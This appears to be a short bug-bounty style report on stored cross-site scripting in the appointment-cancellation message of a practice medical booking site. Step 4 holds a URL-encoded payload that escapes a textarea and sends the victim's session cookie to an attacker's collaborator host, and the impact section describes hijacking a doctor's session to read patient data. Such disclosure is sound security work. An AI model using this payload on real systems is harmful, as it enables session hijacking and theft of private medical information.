When canceling an appointment, you can update the message of the appointment via /api/ma.php . With the proper elements, you can escape the "textarea" field and execute arbitrary javascript.

Steps to repoduce:

1. Create an appointment and make note of the ID
2. Click "Manage Appointment" and input your ID. Hit "Cancel your Appointment"
3. In burp, send the POST request that canceled the appointment to repeater
4. Add the "message" field with the following payload:

   message=</textarea/x><script>var%20oReq%20%3D%20new%20XMLHttpRequest%28%29%3BoReq.open%28%22GET%22%2C%20%22http%3A%2F%2F{collaborator instance}%2F%22%2Bdocument.cookie%29%3BoReq.send%28%29%3B</script>

5. Go back to the appointment directly: http://firstbloodhackers.com:49701/manageappointment.php?success&aptid={id from step 1}
6. The page should load and the message box will be blank.
7. Go to your collaborator instance and observe that a request was made with the drps cookie in the URL

Impact:

An attacker can send a malicious link to a doctor. If the doctor is logged in and they click it, the attacker is able to use the doctor's drps cookie to hijack their session, since in the PoC above the cookie is exfiltrated to the attackers host. This allows the attacker to view all patient and appointment private information.